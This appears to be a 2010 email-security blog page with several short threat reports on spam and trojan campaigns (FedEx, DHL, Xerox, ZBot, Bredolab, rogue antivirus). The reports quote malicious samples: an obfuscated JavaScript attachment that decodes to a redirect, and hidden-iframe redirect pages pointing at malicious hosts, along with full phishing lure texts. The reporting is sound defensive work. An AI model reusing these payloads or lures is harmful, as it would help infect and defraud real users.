Spam message inside a ZIP file

August 25, 2010 1 Comment

Spammer often use new techniques in order to deliver the message to the recipient without being catched by email security solutions. Today, one of such spam emails did caught our attention because of the original technique that has been used.

The spam email had the subject “Your wife photos attached”, a very short body content ” Your wife photos” and the attached file rooster.zip.

At first, we thought this was some new email security treath so we investigated the ZIP archive. Once extracted the file rooster.jpg was available. The filename does not end with .exe or the combination of many spaces with at the end .exe so we opened the JPEG and got this spam advertisment for Viagra, Cialis and VPXL.

The instructions, if you are interested, is to go to med242.ru which leads to the web site of the Canadian Pharmacy.

I can understand that spammers try different techniques but this one is, in my humble opinion, not a very good one. What a hassle to read the message.

Filed under Spam Tagged with ,

FedEx emails with new trojan variant

August 25, 2010 5 Comments

MX Lab intercepted a new campaign of FedEx emails that have a trojan attached to the message. The email is sent from the spoofed address ”Fedex Support, Trisha Kimble” <kyeagl@fedex.com> – please note that the name of the person can change.

Possible subjects:

Fedex Invoice Copy N25524750
Fedex Item Status N4347526
Fedex Shipment Status N0919106
Fedex Tracking Number N7897143

The body of the email does not contains any text but only an embedded image.

The email has the attachment  FEDEXInvoiceEE438252OP.zip. The 36 kB large file FedexInvoice_EE776129.exe is extracted from the zip archive.

At the time of writing, only 8 of the 42 AV engines at Virus Total did detect the trojan. The trojan is known as W32/Agent.JBI (Authentium), Suspicious:W32/Malware!Gemini (F-Secure), TrojanDropper:Win32/Oficla.T (Microsoft), a variant of Win32/Kryptik.GHC (NOD32).

Virus Total permlink and MD5: 2587d5dc4b18e652532e556ac26f2290

Filed under Malware, Viruses Tagged with , , , ,

New Oficla trojan version in emails with subject “Scan from a Xerox WorkCentre Pro”

August 20, 2010 1 Comment

MX Lab intercepted some emails with the subject “Scan from a Xerox WorkCentre Pro N 6204257″ that contains the latest Oficla trojan variant. The emails are sent from a spoofed email address and contains a subject in one of the following formats:

Scan from a Xerox WorkCentre Pro $6208924
Scan from a Xerox WorkCentre Pro #7943943
Scan from a Xerox WorkCentre Pro N9700617

Body of the email:

Please open the attached document. It was scanned and sent to you using a Xerox
WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set
Device Name: XRX6919AA7ACDB46116749

For more information on Xerox products and solutions, please visit

http://www.xerox.com

The email contains a ZIP archive named Tax report.zip with the 56 kB large document Xerox_doc.exe inside.

Virus Total permlink and MD5: eadf133be4dc58050626a5fd194fc546.

Filed under Malware, Viruses Tagged with , , ,

Analysis of rogue anti virus software

August 20, 2010 2 Comments

MX Lab reported earlier in some blog articles about the circulation of a malware campaign that leads to rogue anti virus software and further infections of your computer in the following articles:

Resume emails with attached file Resume.html leads to rogue AV software
Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

We just managed to get a real sample of the malware and a working web site that hosts the malicious scripts and fake anti virus screens. In a comment on one of our blog posts, a writer has delivered us the following URL hxxp://kidstylesource.com/x.html.

When we tried this one we got the iframe scripting that is used in this campaign:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://cetogilco.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://protectionreader.in/media/index.php?
xml=back&rnd=img&nid=151&hash=ecard&c=4" style="visibility: hidden;" height="1" width="1">
</iframe>

</body></html>

We soon got the following screen in our browser and a pop up window with the message that our system is infected. Oh, yes, we continue now to see what happens. Do not try this at home!

After clicking on OK we got a screen that starts scanning the computer system. The progress bar will advance very fast for such an anti virus scanner and the first alleged infections are found on your system.

A new popup will appear with a Windows Security Alert when the scan is finished. When we click on the button Remove all we got the option to download the file 164 kB large file antivirus.exe.

When submitting this file to Virus Total, 19 of the 42 AV engines did detect the trojan with names like W32/Katusha.D.gen!Eldorado (Authentium), W32/Katusha.D.gen!Eldorado (F-Prot), Mal/FakeAV-EI (Sophos) or TROJ_FAKEAV.SMDO (Trend Micro).

Virus Total permlink and MD5: b9734f1148c03a7f90ad77cb81dc6f1d.

Filed under Malware, Viruses Tagged with , , , , ,

Resume emails with attached file Resume.html leads to rogue AV software

August 19, 2010 5 Comments

MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE=”Javascript”><!–
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%
72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B
%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%
6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)
}
runit()
//–>
</script>

<SCRIPT LANGUAGE=”Javascript”><!–//function xhtmldecode(x){document.write(unescape(x))}function runit(){x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)}runit()//–></script>

When opening the attached HTML file you are directed to a web site witht he following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogua anti virus software antivirus_24.exe as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

Filed under Malware, Viruses Tagged with , ,

DHL tracking emails are back with new trojan variants

August 13, 2010 3 Comments

Since a few days, MX Lab is intercepting a new trojan variant in emails regarding a DHL delivery. The email coms from the spoofed address DHL Parcel Support <help.id990@dhl.com>.

Common subjects are:

DHL Delivery. Please get your parcel NR7883
DHL Delivery. Get your parcel NR7308
DHL Delivery. Get your parcel ID0290
DHL Delivery Service. Error in delivery address
DHL International. Your Parcel Number 0066
DHL Services. Get your parcel ID212
DHL Servise. Parcel number 3005
….

The body of the email:

Dear customer.

We were not able to deliver your package to your address!

Reason:” incorrect address “
Please pick up your package in local DHL office.
Scheduled Delivery: 21-August-2010

Attention!
The post label is attached to this e-mail.
We kindly ask you to print it and take it to the post office to pick up the package.

Thank you!

The trojan is known as TROJ_OFICLA.AMG (TrendMicro), Trojan:Win32/Oficla.V (Microsoft), W32/Trojan3.BXP (F-Prot), Mal/EncPk-AX (Sophos), Trojan.Oficla.AC (BitDefender).

The attached ZIP file is approx. 44 kB large and is in the format of: Print_label_ID347a.zip. Once extracted, an .exe file is present from the archive.

Virus Total permlink and MD5: 5d16e73e05c8e03325e6971781b0af78.

Filed under Viruses Tagged with , , ,

New ZBot trojan in the wild

August 13, 2010 1 Comment

MX Lab intercepted a new ZBot trojan attached to emails with changing subjects and body content.

The following email subjects are being used:

Another candidate brought to you
EBOD Meeting MEC Update
Fw: New Taxes Coming
Summary of payments

The email body also changes with every new email version. Here are some examples:

Enjoy… email with questions.. have a great safe weekend… still need more letters… get it done!

In Unity!

Chauncey Pennington

knuts,

Attached are two files showing the amounts paid this past year.
The files are in Lotus 1-2-3 but I think you can open these in Excel or the Open office spread sheet.
This is working very nicely.

Bradley Jacobs

Hi,

This is Charles Brand working as a Technical Team Lead in IBM with over 10 years of solid mainframe development experience. I am confident that my skills will match for this requirement.

Please find the resume as a word attachment. I am available at 404-353-5442 for a discussion. BTW I am in EST time zone.

Looking forward to work with you.

Thanks
Charles

I have attached part of that document toward the bottom so you can print it out for your friends.

“Excellence is an art won by training and habituation. We do not act rightly because we have virtue or excellence, but we rather have those because we have acted rightly. We are what we repeatedly do. Excellence, then, is not an act but a habit” Aristotle

Along with the subject and body content changes, the attached ZIP file also has different file names:

2010 MEC Update.zip
2010 Financing.123.zip
resume.zip
six_months.zip

At the time of writing, only 4 of the 42 AV engines at Virus Total did detect the treath. Virus Total permlink and MD5: 0f80c925e86d069e651eed8a4836f1be.

Filed under Viruses Tagged with , , ,

New Bredolab trojan in the wild

August 13, 2010 5 Comments

MX Lab intercepted a new Bredolab trojan attached to emails with changing subjects and body content.

The following email subjects are being used:

Beauty and the Geek 2
First Birthday Invitation
fill this Passport form
In USA on August 15 and 16
Resume & Coverletter – Feedback
Status
Your reservation is confirmed – Ref: 12801/267373

The email body also changes with every new email version. Here are some examples:

Hi Joe,

I will be in USA on August 15, 16 and 17. I have a job interview on August 15 and available on August 16. I wonder if you and your partners will be available to catch up on any job prospect at your company.

I have attached my resume again with few changes.

Please let me know your availability. Thank you.

Best Regards,
Salvatore

Hello,

Thank you for making a booking through Allhotels

This voucher confirms that you have paid $ 1,100.00 as a deposit for the cost of the rooms and services detailed below. The guest must present this voucher, along with photo identification matching the guest name on this voucher, to the hotel on check-in.

The hotel will also ask for a valid credit card on check-in. This is to cover incidental expenses like meals, drinks, laundry, etc. Guests are responsible for payment of all extra charges direct to the hotel.

Please find the details in the attachment.

Hello All,

Please treat this as my personal invitation , Grace the occasion with your presence and bless my elder brother’s daughter on her first birthday.

Date: Sunday, August 15

Please find the venue details in the attachment.

Thanks,
Jordan Fish

Along with the subject and body content changes, the attached ZIP file also has different file names:

Resume.zip
invitation.zip

The attached ZIP archive is around  120 kB large, once extracted an .exe file is unpacked with the same name as the ZIP archive.

The trojan is known as Gen:Variant.Bredo.6 (Bitdefender), W32/Zbot.AN.test!Eldorado (F-Prot), W32/Trojan3.BXW (Authentium).

The following files will be created:

%Windir%\host32.exe
%Windir%\jh87uhnoe3\ewf32.nls
%Windir%\jh87uhnoe3\ewfrvbb.nls

The following directory will be created:

%Windir%\jh87uhnoe3

Several Windows registry modification are executed to the infected system.

At the time of writing, only 6 of the 42 AV engines at Virus Total did detect the treath. Virus Total permlink and MD5: 4150a1deee2bb6852095627df34defb3.

Filed under Viruses Tagged with , , ,

MX Lab group on LinkedIn

August 13, 2010 Leave a Comment

“Join the corporate group of MX Lab, provider of email security services like zero hour anti virus, managed anti spam and email archiving solutions. This group is open to everyone who is involved or interested in email security.”

Join the MX Lab group on LinkedIn.

Filed under MX Lab News Tagged with , ,

Campaign with emails that lead to rogue AV software antivirus_24.exe continues

August 10, 2010 Leave a Comment

MX Lab reported yesterday of emails where famous brands are used to lead users to a web site that hosts a malicious file antivurs_24.exe.

Today, MX Lab intercepted even more of those emails leading to a web site hxxp://clinique-fuer-schoene-haut.de/x.html. This site has the following malicious code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

After 4 second syou will get redirected to hxxp://hoopdotami.cz.cc/scanner5/?afid=24.

The brands we intercepted are Ikea, Macys, Snapfish, Zappos, SurveySpot, XM, Focus Point Global and Very Best Baking. Here are some screens of the emails.

More information regarding the treath can be found in the blog post Malicious emails lead to rogue AV software antivirus_24.exe.

Filed under Malware, Viruses

Older posts

Follow

Get every new post delivered to your Inbox.

Join 109 other followers